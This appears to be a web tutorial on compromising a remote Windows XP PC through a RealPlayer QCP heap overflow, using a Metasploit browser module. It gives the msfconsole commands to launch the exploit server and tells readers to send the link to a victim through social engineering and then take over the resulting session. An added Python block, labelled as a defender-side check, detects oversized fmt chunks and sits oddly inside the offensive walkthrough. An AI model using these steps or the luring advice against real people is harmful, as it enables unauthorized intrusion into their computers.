Hack Remote PC with Real Networks RealPlayer QCP Parsing Heap Overflow Exploit

This module exploits a heap overflow in RealPlayer when handling a .QCP file. The specific flaw exists within qcpfformat.dll: a static 256-byte buffer is allocated on the heap and user-supplied data from the file is copied into it within a memory copy loop without a length check. This allows a remote attacker to execute arbitrary code in the context of the web browser via a .QCP file with a specially crafted “fmt” chunk. At present the module targets Windows XP with IE6 and IE7.
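As an added defender-side check (not part of the Metasploit module or the original post), here is a small Python parser that walks the RIFF chunks of a .QCP file and flags a “fmt ” chunk whose declared size exceeds the 256-byte buffer described above. It assumes the standard RIFF container layout of QCP files with form type "QLCM"; the sample files it checks are constructed inline.

```python
import struct

# Constructed samples for this check, not files from the exploit module: a QCP file is a
# RIFF container with form type "QLCM" whose "fmt " chunk is what qcpfformat.dll parses.
FMT_BUFFER_LIMIT = 256  # static heap buffer size stated in the advisory text above


def build_qcp(fmt_payload: bytes) -> bytes:
    """Build a minimal RIFF/QLCM container carrying fmt_payload in its 'fmt ' chunk."""
    chunk = b"fmt " + struct.pack("<I", len(fmt_payload)) + fmt_payload
    if len(fmt_payload) % 2:
        chunk += b"\x00"  # RIFF chunks are padded to an even length
    body = b"QLCM" + chunk
    return b"RIFF" + struct.pack("<I", len(body)) + body


def iter_chunks(data: bytes):
    """Yield (fourcc, declared_size, payload) for each chunk after the 12-byte RIFF header."""
    pos = 12
    while pos + 8 <= len(data):
        fourcc = data[pos:pos + 4]
        size = struct.unpack_from("<I", data, pos + 4)[0]
        payload = data[pos + 8:pos + 8 + size]
        yield fourcc, size, payload
        if len(payload) < size:
            return  # declared size runs past end of file: truncated or lying header
        pos += 8 + size + (size & 1)


def check_qcp(data: bytes) -> list:
    """Return findings for a QCP file; an empty list means no oversized 'fmt ' chunk."""
    if len(data) < 12 or data[:4] != b"RIFF":
        return ["not a RIFF container"]
    if data[8:12] != b"QLCM":
        return []  # some other RIFF form (e.g. WAVE); out of scope for this check
    findings = []
    for fourcc, size, payload in iter_chunks(data):
        if fourcc == b"fmt " and size > FMT_BUFFER_LIMIT:
            findings.append(
                f"fmt chunk declares {size} bytes ({len(payload)} present), "
                f"exceeds the {FMT_BUFFER_LIMIT}-byte buffer"
            )
    return findings


if __name__ == "__main__":
    for label, size in (("benign", 64), ("oversized", 512)):
        print(label, check_qcp(build_qcp(b"\x00" * size)) or "ok")
```

The check uses the declared chunk size rather than the bytes actually present, so a truncated file that still advertises an oversized chunk is flagged as well.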

Exploit Targets

RealPlayer 11.0 – 11.1

RealPlayer SP 1.0 – 1.1.5

RealPlayer 14.0.0 – 14.0.5

Internet Explorer 7.0.5730.13

Apple RealPlayer


Attacker: Backtrack 5

Victim PC: Windows XP

Open a BackTrack terminal and type msfconsole

Now type use exploit/windows/browser/realplayer_qcp

msf exploit(realplayer_qcp) > set SRVHOST <local IP address> (this must be an address on the local machine)

msf exploit(realplayer_qcp) > set URIPATH realplayer (the URL path to use for this exploit)

msf exploit(realplayer_qcp) > exploit

Metasploit now displays the URL that you should give to your victim.

Send the link of the server to the victim via chat or email or any social engineering technique.

Once the victim opens the link, you have a session on the victim's PC. Type “sessions -l” to list the open sessions and note the session ID, then type “sessions -i ID” to interact with that session.
